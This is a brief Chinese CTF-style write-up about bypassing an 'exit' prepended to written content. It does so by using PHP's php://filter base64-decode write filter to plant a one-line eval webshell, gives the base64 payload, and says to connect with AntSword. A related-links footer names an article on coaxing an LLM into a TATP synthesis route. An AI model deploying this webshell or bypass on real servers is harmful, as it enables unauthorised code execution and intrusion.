代码审计,发现写进去的东西会加上exit,这样的话后面的内容就不能执,那就写个过滤器进行绕过,重点是考虑一下base64的解码位置,构造一句话木马,
使用base64的话
<?php eval($_POST['a']);
Base64 编码后:PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7
需要给前面随便补充一位,过滤器是php://filter/write=convert.base64-decode/resource=shell.php
写入成功后用蚁剑连接
相关推荐
阿部多瑞 ABU44 分钟前
ADRO实战:用渐进式诱导“聊出”TATP完整合成路线——某国产大模型红队测试实录@insist1232 小时前
信息安全工程师-工控安全产品体系与行业实践全解析Agent手记2 小时前
制造业生产安全隐患智能识别系统落地指南 —— 结合企业级Agent构建国产安全闭环防御体系@insist1233 小时前
信息安全工程师-移动应用安全核心知识体系与备考指南无风听海3 小时前
OAuth 2.0 client_id深度解析:从规范到安全实践星辰徐哥3 小时前
AI安全实战:AI系统渗透测试的实战案例解析宋浮檀s4 小时前
应急响应(系统日志)txg6664 小时前
编译无关的漏洞检测:基于 Transformer 的 LLVM-IR 与汇编鲁棒建模萤丰信息4 小时前
全域物联深度落地,打造高安全、高效率智慧园区新标杆ylscode6 小时前
npm遭遇大规模供应链投毒:@antv生态被植入Shai-Hulud后门,全球开发者需紧急排查